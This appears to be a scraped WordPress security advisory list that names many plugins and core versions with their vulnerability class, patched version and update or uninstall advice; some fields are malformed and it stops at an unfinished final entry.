Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Google Analytics Dashboard for WordPress <= 5.4.4
Patched Version: 5.4.5
Recommended Action: Update to version 5.4.5, or a newer patched version

Plugin: Featurific For WordPress

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Favicon by RealFaviconGenerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated OAuth Connection Key Disclosure
Patched Version: 3.4.34.1
Recommended Action: Update to version 3.4.34.1, or a newer patched version

Plugin: Spiffy XSPF Player

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Chained Products

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: Coming soon and Maintenance mode

Vulnerability: Cross-Site Request Forgery to Arbitrary Email Send
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: PHP Object Injection
Patched Version: 5.0.1
Recommended Action: Update to version 5.0.1, or a newer patched version

Plugin: Hyphenator

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Table by Supsystic

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: neuvoo-jobroll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Novelist

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Book Information Fields
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Cross-Site Request Forgery via ‘setIgnore’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Uji Countdown

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Random Text

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The School Management Pro

Vulnerability: Remote Code Execution
Patched Version: 9.9.7
Recommended Action: Update to version 9.9.7, or a newer patched version

Plugin: Latest Tweets Widget

Vulnerability: Arbitrary Settings Update via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom CSS Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar

Vulnerability: Missing Authorization to Template Import
Patched Version: 4.10.1
Recommended Action: Update to version 4.10.1, or a newer patched version

Plugin: Tera Charts

Vulnerability: Directory Traversal
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: Crisp – Live Chat and Chatbot

Vulnerability: No subtitle
Patched Version: 0.32
Recommended Action: Update to version 0.32, or a newer patched version

Plugin: Advanced Admin Search

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: WP OAuth2 Server

Vulnerability: Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: S2W – Import Shopify to WooCommerce

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.1.13
Recommended Action: Update to version 1.1.13, or a newer patched version

Plugin: AccessAlly

Vulnerability: Arbitrary Code Execution
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Protected Posts Logout Button

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Smartideo

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Contributor+) Sensitive Information Exposure via Comments on Protected Posts
Patched Version: 4.1.39
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.39, 4.2.36, 4.3.32, 4.4.31, 4.5.30, 4.6.27, 4.7.27, 4.8.23, 4.9.24, 5.0.20, 5.1.17, 5.2.19, 5.3.16, 5.4.14, 5.5.13, 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: Store Locator for WordPress with Google Maps – LotsOfLocales

Vulnerability: SQL Injection
Patched Version: 3.34
Recommended Action: Update to version 3.34, or a newer patched version

Plugin: Gallery – Photo Albums Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.29
Recommended Action: Update to version 1.2.29, or a newer patched version

Plugin: Rock Convert

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: Login with TOTP (Google Authenticator, Microsoft Authenticator)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WP-dTree

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blog Grid & Post Grid – Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry, Category Post Grid By News & Blog Designer Pack

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: FAQs Manager

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP DSGVO Tools (GDPR)

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: Content Egg

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Weblizar Pin Feeds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Remote Code Execution
Patched Version: 1.10.4
Recommended Action: Update to version 1.10.4, or a newer patched version

Plugin: WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.1.23
Recommended Action: Update to version 3.1.23, or a newer patched version

Plugin: Thumbnail carousel slider

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Missing Authorization to Remote Code Execution
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Stock Exporter for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Missing Authorization via multiple functions
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: New User Email Set Up

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Favorites Extension

Vulnerability: Authenticated (Subscriber+) Arbitrary Plugin Installation
Patched Version: 4.0.11
Recommended Action: Update to version 4.0.11, or a newer patched version

Plugin: Camera slideshow

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smart Slider 3

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.0.9
Recommended Action: Update to version 3.5.0.9, or a newer patched version

Plugin: Cincopa video and media plug-in

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.137
Recommended Action: Update to version 1.137, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: PHP Object Injection
Patched Version: 1.9.36
Recommended Action: Update to version 1.9.36, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: SQL Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Dropdown Menu Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 5.4.6
Recommended Action: Update to version 5.4.6, or a newer patched version

Plugin: Vrm 360 3D Model Viewer

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Appbox

Vulnerability: Local File Inclusion
Patched Version: 4.3.18
Recommended Action: Update to version 4.3.18, or a newer patched version

Plugin: BannerMan

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shieldon – WordPress Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Bulk Delete Users by Email

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Header Footer Code Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.24
Recommended Action: Update to version 1.1.24, or a newer patched version

Plugin: Side Cart Woocommerce | Woocommerce Cart

Vulnerability: No subtitle
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Cross-Site Request Forgery to Account Compromise
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Multi Rating

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add SVG Support for Media Uploader | inventivo

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Slideshow Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Banner Cycler

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Direct checkout, Add to cart redirect, Quick purchase button, Buy now button, Quick View button for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.49
Recommended Action: Update to version 2.1.49, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: 123ContactForm for WordPress

Vulnerability: Validation Bypass via Plugin Verification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Product Feed on WooCommerce for Google, Awin, Shareasale, Bing, and More

Vulnerability: Authenticated SQL Injection via product_id Parameter
Patched Version: 3.3.1.0
Recommended Action: Update to version 3.3.1.0, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: 2.6.10
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Improper Authorization via get_remote_templates REST endpoint
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 9.2
Recommended Action: Update to version 9.2, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Missing Authorization via mvx_save_dashpages
Patched Version: 4.0.24
Recommended Action: Update to version 4.0.24, or a newer patched version

Plugin: Shop as a Customer for WooCommerce

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: LifterLMS Paypal

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Authenticated (Administrator+) Directory Traversal to Arbitrary CSV File Deletion
Patched Version: 7.5.0
Recommended Action: Update to version 7.5.0, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.29
Recommended Action: Update to version 3.1.29, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Directory Traversal to Arbitrary File Deletion
Patched Version: 0.8.9.1
Recommended Action: Update to version 0.8.9.1, or a newer patched version

Plugin: FlyingPress

Vulnerability: Missing Authorization
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Unauthorised Arbitrary Post Metadata Access
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Payment Form for PayPal Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Custom Contact Forms

Vulnerability: Missing Authorization
Patched Version: 5.1.0.4
Recommended Action: Update to version 5.1.0.4, or a newer patched version

Plugin: Hide login page, Hide wp admin – stop attack on login page

Vulnerability: Login Page Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Five Star Restaurant Reservations – WordPress Booking Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: 3com – Asesor de Cookies para normativa española

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Hardcoded Encryption Key
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Stored Cross-Site Scripting via Gallery Title
Patched Version: 1.5.67
Recommended Action: Update to version 1.5.67, or a newer patched version

Plugin: WP-CORS

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: Larsens Calender

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Arbitrary File Deletion
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Authenticated (Admin+) Arbitrary File Read
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Arbitrary Asset Manager Usage
Patched Version: 3.1.23
Recommended Action: Update to version 3.1.23, or a newer patched version

Plugin: Generate Dummy Posts

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blue Admin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via tab and section parameter
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Premmerce Redirect Manager

Vulnerability: Cross-Site Request Forgery via deleteRedirect()
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: 301 Redirect Manager <= 6.3
Patched Version: 6.4
Recommended Action: Update to version 6.4, or a newer patched version

Plugin: AI Engine

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.83
Recommended Action: Update to version 1.6.83, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Information Exposure via Arbitrary File Download
Patched Version: 5.6.5
Recommended Action: Update to version 5.6.5, or a newer patched version

Plugin: Titan Anti-spam & Security

Vulnerability: Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: Add From Server

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: KN Fix Your Title

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Scroll post excerpt

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: PublishPress Capabilities Pro

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 4.68
Recommended Action: Update to version 4.68, or a newer patched version

Plugin: Simplr Registration Form Plus+

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 6.9.10
Recommended Action: Update to version 6.9.10, or a newer patched version

Plugin: Layer Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Stored Cross-Site Scripting via Media Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Like box – Page Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: ReDi Restaurant Reservation

Vulnerability: Stored Cross-Site Scripting
Patched Version: 21.0426
Recommended Action: Update to version 21.0426, or a newer patched version

Plugin: Menu Item Visibility Control

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Activity Log Premium

Vulnerability: Missing Authorization via ajax_switch_db
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MailCWP

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: External Media without Import

Vulnerability: Authenticated (Subscriber+) Blind Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Paypal Payments

Vulnerability: Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Polls CP

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WP-Planet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form by Supsystic

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.20
Recommended Action: Update to version 1.7.20, or a newer patched version

Plugin: CPO Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Security Optimizer – The All-In-One Protection Plugin

Vulnerability: Authentication Bypass via 2FA Setup
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Easy SVG Support

Vulnerability: Cross-Site Scripting via SVG Upload
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Missing Domain Restriction
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Open Redirect
Patched Version: 3.3.17
Recommended Action: Update to version 3.3.17, or a newer patched version

Plugin: Rental and Booking Manager for Bike, Car, Dress, Resort with WooCommerce Integration – WpRently | WordPress plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Enable Media Replace

Vulnerability: Authenticated (Author+) PHP Object Injection
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Redirection

Vulnerability: Local File Inclusion
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WP Marketplace – Complete Shopping Cart / eCommerce Solution

Vulnerability: Path Traversal
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 4.9.24
Recommended Action: Update to version 4.9.24, or a newer patched version

Plugin: GA Universal

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Variation Swatches for WooCommerce

Vulnerability: Cross-Site Request Forgery via delete_settings
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: PublishPress Capabilities – User Role Editor, Access Permissions, Admin Menus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WP Ultimate Email Marketer

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Improper Access Control to Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Telegram Bot & Channel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible

Vulnerability: Frontend Manager for WooCommerce <= 6.5.11
Patched Version: 6.5.12
Recommended Action: Update to version 6.5.12, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: MainWP File Uploader Extension

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to New Category Creation
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Slider by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: MDTF – Meta Data and Taxonomies Filter

